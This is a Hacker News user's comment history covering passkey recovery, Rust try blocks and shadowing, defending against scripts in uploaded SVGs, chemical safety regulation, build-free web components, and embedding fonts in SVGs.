Hacker Newsnew | past | comments | ask | show | jobs | submit | bobbylarrybobby's commentslogin

Why would a website leave you with an account but no way to log in aside from the account recovery procedure?

You register from your MacBook, then add your Android phone, then remove your MacBook key, the lose your Android phone.

The messed up thing is that the simplest backup option is a magic login link which is obviously less secure. Also you cannot sink a passkey between platforms unless you use a third party Authenticator so you have to have a backup method of some sort even if not for recovery reasons.


Try blocks let you encapsulate the early-return behavior of Try-returning operations so that they don't leak through to the surrounding function. This lets you use the ? operator 1. when the Try type doesn't match that of the function this is taking place in 2. when you want to use ? to short circuit, but don't want to return from the enclosing function. For instance, in a function returning Result<T,E>, you could have a try block where you do a bunch of operations with Option and make use of the ? operator, or have ? produce an Err without returning from the enclosing function. Without try blocks, you pretty much need to define a one-off closure or function so that you can isolate the use of ? within its body.

You can also de-mut-ify a variable by simply shadowing it with an immutable version of itself:

let mut data = foo(); data.mutate(); let data = data;

May be preferable for short snippets where adding braces, the yielded expression, and indentation is more noise than it's worth.


Variable shadowing felt wrong for a while because it's considered verboten in so many other environments. I use it fairly liberally in rust now.

It helps that the specific pattern of redeclaring a variable just to change its mutability for the remainder of its scope is about the least objectionable use of shadowing possible.

That's not the only place I use shadowing though. I use it much more liberally.

For example I feel this is right:

    let x = x.parse()?;

Would it be possible for messenger apps to simply ignore <script> tags (and accept that this will break a small fraction of SVGs)? Or is that not a sufficient defense?

I looked into it for work at some point as we wanted to support SVG uploads. Stripping <script> is not enough to have an inert file. Scripts can also be attached as attributes. If you want to prevent external resources it gets more complex.

The only reliable solution would be an allowlist of safe elements and attributes, but it would quickly cause compat issues unless you spend time curating the rules. I did not find an existing lib doing it at the time, and it was too much effort to maintain it ourselves.

The solution I ended up implementing was having a sandboxed Chromium instance and communicating with it through the dev tools to load the SVG and rasterize it. This allowed uploading SVG files, but it was then served as rasterized PNGs to other users.


Shouldn't the ignoring of scripting be done at the user agent level? Maybe some kind of HTTP header to allow sites to disable scripts in SVG ala CORS?

It's definitely a possible solution if you control how the file are displayed. In my case I preferred the files to be safe regardless of the mechanism used to view them (less risk of misconfiguration).

Content-Security-Policy: default-src 'none'

No, svgs can do `onload` and `onerror` and also reference other svgs that can themselves contain those things (base64'd or behind a URI).

But you can use an `img` tag (`<img src="evil.svg">`) and that'll basically Just Work, or use a CSP. I wouldn't rely on sanitizing, but I'd still sanitize.


> But you can use an `img` tag (`<img src="evil.svg">`) and that'll basically Just Work

That doesn't help too much if evil.svg is hosted on the same domain (with default "Content-Type: image/svg+xml" header), because attacker can send a direct link to the file.


Reddit horribly breaks direct links to images and serves html instead.

Shouldn't most chemicals be assumed unsafe until proven otherwise? How many chemicals have we produced in a lab that have no harmful effects? Even medicine is bad for you, it's just better than the disease it's meant to treat. I don't know why we'd treat something designed to kill animals as safe for humans without studies showing that it's not harmful. (Well I do know why, but I don't know why voters go along with it.)

Literally everything is "chemicals".

And when we're talking about things in this realm, the general saying is "The dose makes the poison"... Water will kill you if you drink enough of it.

And we do have all sorts of studies showing that harm from these substances isn't immediately apparent (they all have safety sheets, and maximum safe exposure levels) . What we're missing, mainly because it's just incredibly hard to ethically source, is long term studies.

So the question you're really asking is "what's your tolerance to risk?". I think it's fine to have different governing bodies take different stances on that scale. What's less fine is failure to act on information because of profit motives.

Long story short - this isn't so simple. You bathe in chemicals all day every day.


I daresay that the issue is less about "chemicals" and more about "new chemicals". If a substance already exists in nature and has been in use for a long time, then it's reasonable to take the position that it is probably within harm limits. If it's a newly synthesised/extracted substance, then it should be subject to reasonable testing.

Also, if a chemical is known to be toxic, then rigorous testing should be performed before allowing it to be widely distributed and used.


> If a substance already exists in nature and has been in use for a long time, then it's reasonable to take the position that it is probably within harm limits.

Reasonable, but wrong.

Simple case: Did you know that occupational sawdust exposure is strongly associated with cancer in the paranasal sinuses and nasal cavity?

There's also some pretty compelling evidence that coronavirus's (so common cold & flu) are associated with dementia/Alzheimer's.

Alcohol increases cancer rate more than some of the "chemicals" people will complain about. So does Bacon. So does sunlight.

All of which have been floating around in Human contact for a LONG time.

Again - we do a pretty good job at filtering out the stuff that's fast acting and harmful. It's just really difficult to tease out information that requires long term monitoring and involves small/moderate increases in risk.

Think about how long it took us to figure out that lead exposure is really nasty. We used lead for thousands of years prior, and it's literally a base element.

---

As for

> Also, if a chemical is known to be toxic, then rigorous testing should be performed before allowing it to be widely distributed and used.

No one is arguing otherwise, and normally large and expensive studies are done on short term harm (extensive animal testing). But you tell me how we can reasonably and ethically do longitudinal studies on large groups of humans to determine if a new substance is going to cause small/moderate cancer rate bumps over 50+ years?

This is just genuinely a difficult problem to address, and it's not simply like we can go "wait 50 years and see"! Because usually we're trying to use these things to address existing problems. Ex - pesticides and fertilizers might still be net positives even with the cancer risk - do we avoid them and let people starve today? Or feed everyone now and have a 10% bump in cancer rates 50 years later? There's no golden ticket here.


>Shouldn't most chemicals be assumed unsafe until proven otherwise?

Of course not, that would be bad for capitalists. /s


On the one hand I can see the appeal of not having a build step. On the other, given how many different parts of the web dev pipeline require one, it seems very tricky to get all of your dependencies to be build-step-free. And with things like HMR the cost of a build step is much ameliorated.

I haven't run into any steps that require one, there's always alternatives.

Do you have anything specific in mind?


Anything that uses JSX syntax, for instance.

Any kind of downleveling, though that's less important these days most users only need polyfills, new syntax features like `using` are not widely used.

Minification, and bundling for web is still somewhat necessary. ESM is still tricky to use without assistance.

None of these are necessary. But if you use any of them you've already committed to having a build step, so adding in a typescript-erasure step isn't much extra work.


If there is one thing I don't miss using WebComponents is JSX. lit-html is much, much better.

It's such a lovely and simple stack.

No Lit Element or Lit or whatever it's branded now, no framework just vanilla web components, lit-html in a render() method, class properties for reactivity, JSDoc for opt-in typing, using it where it makes sense but not junking up the code base where it's not needed...

No build step, no bundles, most things stay in light dom, so just normal CSS, no source maps, transpiling or wasted hours with framework version churn...

Such a wonderful and relaxing way to do modern web development.


I love it. I've had a hard time convincing clients it's the best way to go but any side projects recently and going forward will always start with this frontend stack and no more until fully necessary.

This discussion made me happy to see more people enjoying the stack available in the browser. I think over time, what devs enjoy using is what becomes mainstream, React was the same fresh breeze in the past.

I recently used Preact and HTM for a small side project, for the JSX-like syntax without a build step.

You can combine the second and third strategies to hit the sweet spot of time and space.

You brought up an important opportunity for optimization. If you know the distribution of your data, it may make more sense to implement it in terms of the odd numbers and leave even numbers as the fallback. It's important to profile with a realistic distribution of data to make sure you're targeting the correct parity of numbers.

Safari supports base64-embedding font files in a <style>’s @font-face {} (iirc it's something like `@font-face { src: url('data:application/x-font-woff;charset=utf-8;base64,...'); }`) that can then be referenced as normal throughout the SVG. I don't recommend this though, nobody wants to deal with 500KB SVGs.

The idea was that you can embed only the glyphs used in a text. For example, instead of embedding thousands of existing Chinese characters, embed only 20 of them. Embedding is necessary anyway because otherwise you cannot guarantee that your image will be displayed correctly on the other machine.

Also, allowing CSS inside SVG is not a great idea because the SVG renderer needs to include full CSS parser, and for example, will Inkscape work correctly when there is embedded CSS with base64 fonts? Not sure.


> Also, allowing CSS inside SVG is not a great idea because the SVG renderer needs to include full CSS parser, and for example, will Inkscape work correctly when there is embedded CSS with base64 fonts? Not sure.

For better or worse, CSS parsing and WOFF support are both mandatory in SVG 2.[0][1] Time will tell whether this makes it a dead spec!

[0] https://www.w3.org/TR/SVG2/styling.html#StylingUsingCSS

[1] https://www.w3.org/TR/SVG2/text.html#FontsGlyphs


That's how OpenCL died. They made difficult to implement features mandatory.

You can also point to font files with @font-face. I use a small custom font that's only 16 KB. Although, when opening the file locally, you have to first disable local file restrictions in safari's settings before it works...

  <defs>
  <style type="text/css">
  @font-face {
  font-family: 'A-font';
  src: url('A-font.woff') format('woff');
  font-weight: normal;
  font-style: normal; }
  </style>
  </defs>

So if you save the SVG image, it won't display without Internet connection. Not great.

I don't think that helps with embedding fonts.

How well can LLMs reason about avoiding UB? This seems like one of those things where no matter how much code you look at, you can still easily get wrong (as humans frequently do).

Fair point on UB — LLMs absolutely do not reason about it (or anything else). They just reproduce the lowest-common-denominator patterns that happened to survive in the wild.

I’m not claiming the generated C is “safe” or even close. I am sure that in practice it still has plenty of time-bombs, but empirically, for the narrow WASM tasks I tried, the raw C suggestions were dramatically less wrong than the equivalent JavaScript ones — fewer obvious foot-guns, better idioms, etc.

So my original “noticeably better” was really about “fewer glaring mistakes per 100 lines” rather than “actually correct.” I still end up rewriting or heavily massaging almost everything, but it’s a better starting point than the JS ever was.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: